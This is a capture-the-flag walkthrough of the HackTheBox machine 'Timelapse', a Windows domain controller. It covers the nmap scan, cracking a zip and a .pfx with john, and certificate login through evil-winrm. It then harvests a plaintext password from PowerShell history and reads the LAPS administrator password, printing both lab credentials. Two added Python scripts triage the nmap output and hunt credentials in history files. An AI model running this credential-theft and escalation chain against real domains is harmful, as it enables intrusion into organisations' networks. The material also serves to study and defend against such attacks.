⏱️

Timelapse

 
53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,49729,57404
# Nmap 7.94SVN scan initiated Tue Jan 2 15:27:13 2024 as: nmap -sT -sC -sV -O -p53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,49729,57404 -oA nmap/detail 10.10.11.152
Nmap scan report for 10.10.11.152 (10.10.11.152)
Host is up (0.096s latency).

PORT      STATE SERVICE           VERSION
53/tcp    open  domain            Simple DNS Plus
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2024-01-02 15:27:21Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
5986/tcp  open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_  http/1.1
|_http-title: Not Found
|_ssl-date: 2024-01-02T15:28:57+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after:  2022-10-25T14:25:29
9389/tcp  open  mc-nmf            .NET Message Framing
49667/tcp open  msrpc             Microsoft Windows RPC
49673/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc             Microsoft Windows RPC
49729/tcp open  msrpc             Microsoft Windows RPC
57404/tcp open  msrpc             Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2024-01-02T15:28:19
|_  start_date: N/A
|_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m59s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 2 15:29:00 2024 -- 1 IP address (1 host up) scanned in 108.03 seconds
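The scan above carries two details that decide how the rest of the box can be approached: the DC's clock is about 8 hours ahead of the scanner (well beyond the 5-minute tolerance Kerberos allows by default, so Kerberos exchanges fail until clocks agree), and the TLS certificate on the WinRM port 5986 expired more than a year before the scan date. The following Python script is an added example, not part of the original writeup: it parses nmap normal output (the `.nmap` file `-oA` writes) into per-port records, pulls out the clock skew, the certificate validity and the SMB signing status, and prints the findings. `SAMPLE_NMAP` is a constructed excerpt modelled on the scan shown here.

```python
"""Triage nmap normal (-oN / -oA .nmap) output for AD-relevant findings.

Added example, not from the original writeup. SAMPLE_NMAP is a constructed
excerpt modelled on the scan shown on this page.
"""
import re
import sys
from datetime import datetime, timedelta

SAMPLE_NMAP = """\
# Nmap 7.94SVN scan initiated Tue Jan 2 15:27:13 2024 as: nmap -sT -sC -sV -p53,88,445,5986 10.10.11.152
Nmap scan report for 10.10.11.152 (10.10.11.152)
Host is up (0.096s latency).

PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-02 15:27:21Z)
445/tcp  open  microsoft-ds?
5986/tcp open  ssl/http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_ssl-date: 2024-01-02T15:28:57+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after:  2022-10-25T14:25:29
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m59s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
"""

SCAN_TIME_RE = re.compile(r"^# Nmap .* initiated (\w{3} \w{3}\s+\d+ \d\d:\d\d:\d\d \d{4}) as:")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
SKEW_RE = re.compile(r"clock-skew: mean: (-?)(\d+)h(\d+)m(\d+)s")
NOT_AFTER_RE = re.compile(r"Not valid after:\s+(\S+)")

KERBEROS_MAX_SKEW = timedelta(minutes=5)  # Kerberos default clock tolerance


def parse_nmap(text):
    """Return scan time, per-port records (with their NSE script lines) and host-level facts."""
    report = {"scan_time": None, "ports": {}, "clock_skew": None, "smb_signing_required": False}
    current = None  # the port record that following "|" script lines belong to
    for line in text.splitlines():
        m = SCAN_TIME_RE.match(line)
        if m:
            report["scan_time"] = datetime.strptime(m.group(1), "%a %b %d %H:%M:%S %Y")
            continue
        m = PORT_RE.match(line)
        if m:
            current = {"proto": m.group(2), "state": m.group(3), "service": m.group(4),
                       "version": m.group(5).strip(), "scripts": [], "cert_not_after": None}
            report["ports"][int(m.group(1))] = current
            continue
        if line.startswith("Host script results"):
            current = None  # from here on script lines are host-level, not per-port
            continue
        if not line.startswith("|"):
            continue
        body = line.lstrip("|_ ").strip()
        m = SKEW_RE.search(body)
        if m:
            sign = -1 if m.group(1) else 1
            report["clock_skew"] = sign * timedelta(hours=int(m.group(2)), minutes=int(m.group(3)),
                                                    seconds=int(m.group(4)))
        if "Message signing enabled and required" in body:
            report["smb_signing_required"] = True
        if current is not None:
            current["scripts"].append(body)
            m = NOT_AFTER_RE.search(body)
            if m:
                current["cert_not_after"] = datetime.fromisoformat(m.group(1))
    return report


def findings(report):
    """Human-readable list of things worth noting before touching the host."""
    out = []
    skew = report["clock_skew"]
    if skew is not None and abs(skew) > KERBEROS_MAX_SKEW:
        out.append(f"clock skew of {skew} exceeds the Kerberos tolerance of {KERBEROS_MAX_SKEW}; "
                   "Kerberos exchanges with this host fail until clocks agree")
    for port, info in sorted(report["ports"].items()):
        not_after = info["cert_not_after"]
        if not_after and report["scan_time"] and not_after < report["scan_time"]:
            out.append(f"port {port}/{info['proto']} ({info['service']}): "
                       f"TLS certificate expired on {not_after.date()}")
    if not report["smb_signing_required"]:
        out.append("SMB signing is not required on this host")
    return out


if __name__ == "__main__":
    # Usage: python nmap_triage.py nmap/detail.nmap   (no argument runs on the sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_NMAP
    for item in findings(parse_nmap(text)):
        print("-", item)
```

Only the script lines that follow a port line are attributed to that port; everything after `Host script results:` is treated as host-level, which is where nmap puts `clock-skew` and `smb2-security-mode`.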
dc01.timelapse.htb timelapse.htb
Get the password-protected zip file from SMB, then use john to crack the password.
 
Then unzip it to get a .pfx file.
Googling: the .pfx requires another password, so extract a hash for john:
pfx2john legacyy_dev_auth.pfx > pfxhash
Continue cracking; john returns:
thuglegacy (legacyy_dev_auth.pfx)
Googling gives the openssl commands to extract the private key and certificate from the .pfx (the last one strips the passphrase from the key):
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out private.pem
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt
openssl rsa -in private.pem -out private2.pem
 
evil-winrm -i timelapse.htb -S -k private2.pem -c cert.crt
Logged in as legacyy.
type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV
evil-winrm -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -i 10.10.11.152 -S
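The step from legacyy to svc_deploy works only because a plaintext credential was left behind in the PSReadLine history file read above, which PowerShell writes for every interactive session. A defender can hunt for the same exposure across user profiles. The following Python script is an added example, not part of the original writeup: it scans `ConsoleHost_history.txt` content for the common ways a secret ends up on a command line (a literal passed to `ConvertTo-SecureString -AsPlainText`, `-p`/`-password` arguments, `net user` with a password, a literal inside a `PSCredential` constructor, `cmdkey /pass:`) and reports each hit with the secret redacted. The history path is the one the page reads; `SAMPLE_HISTORY` and every secret in it are constructed placeholders, not values from the box.

```python
"""Hunt for plaintext credentials in PowerShell PSReadLine history.

Added example, not part of the original writeup. The history location is the
one read on this page; SAMPLE_HISTORY and every secret in it are constructed.
"""
import ntpath
import re
import sys

# Per-user location PowerShell writes interactive history to (relative to the profile directory).
HISTORY_RELATIVE = ntpath.join("AppData", "Roaming", "Microsoft", "Windows",
                               "PowerShell", "PSReadLine", "ConsoleHost_history.txt")

# Each pattern captures the exposed value in the "secret" group so it can be redacted.
CREDENTIAL_PATTERNS = {
    "ConvertTo-SecureString from literal": re.compile(
        r"""ConvertTo-SecureString\b(?=.*-AsPlainText).*?(?P<q>['"])(?P<secret>.+?)(?P=q)""", re.I),
    "-p/-password with literal": re.compile(
        r"""(?:^|\s)-p(?:assword)?\s+(?P<q>['"])(?P<secret>.+?)(?P=q)""", re.I),
    "net user with password": re.compile(
        r"""\bnet\s+user\s+\S+\s+(?P<secret>[^/\s]\S*)""", re.I),
    "PSCredential with literal password": re.compile(
        r"""PSCredential\s*\(\s*\S+?\s*,\s*(?P<q>['"])(?P<secret>.+?)(?P=q)""", re.I),
    "cmdkey /pass:": re.compile(r"""/pass:(?P<secret>\S+)""", re.I),
}

# Constructed sample history: lines 3, 7 and 8 expose a secret, the others do not.
SAMPLE_HISTORY = r"""whoami
ipconfig /all
$pass = ConvertTo-SecureString 'NotTheRealPassword1!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('timelapse\svc_deploy', $pass)
Invoke-Command -ComputerName DC01 -Credential $cred -ScriptBlock { hostname }
net user backupadmin /domain
net user tempadmin Temp#2024 /add
cmdkey /add:DC01 /user:svc_deploy /pass:Winter2024
Get-ADComputer DC01 -Properties ms-Mcs-AdmPwd
"""


def redact(secret):
    """Keep two characters so a finding can be matched to its source; hide the rest."""
    return secret[:2] + "*" * max(len(secret) - 2, 0)


def scan_history(text):
    """Return one finding per history line that appears to contain a plaintext credential."""
    found = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for indicator, pattern in CREDENTIAL_PATTERNS.items():
            m = pattern.search(line)
            if m:
                found.append({"line": lineno, "indicator": indicator,
                              "redacted": redact(m.group("secret"))})
                break  # one finding per line is enough to raise an alert
    return found


def history_path(profile_dir):
    """History file for one user profile directory (e.g. the legacyy profile on this page)."""
    return ntpath.join(profile_dir, HISTORY_RELATIVE)


if __name__ == "__main__":
    # Usage: python scan_psreadline.py [ConsoleHost_history.txt ...]; no argument runs on the sample.
    sources = [(p, open(p, encoding="utf-8", errors="replace").read()) for p in sys.argv[1:]] \
        or [("SAMPLE_HISTORY", SAMPLE_HISTORY)]
    for name, text in sources:
        for f in scan_history(text):
            print(f"{name}:{f['line']}: {f['indicator']} -> {f['redacted']}")
```

The patterns are heuristics: a `PSCredential` built from a `$variable`, or `net user name /domain`, is deliberately not reported, and anything printed is redacted so the scan output itself does not become a second copy of the secret.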
svc_deploy is able to read the LAPS password (ms-Mcs-AdmPwd):
Get-ADComputer DC01 -property 'ms-mcs-admpwd'
Get-ADComputer DC01 -property *
evil-winrm -u administrator -p '2,uA]7+o3x785.&Ko[1Eh34(' -S -i 10.10.11.152
success!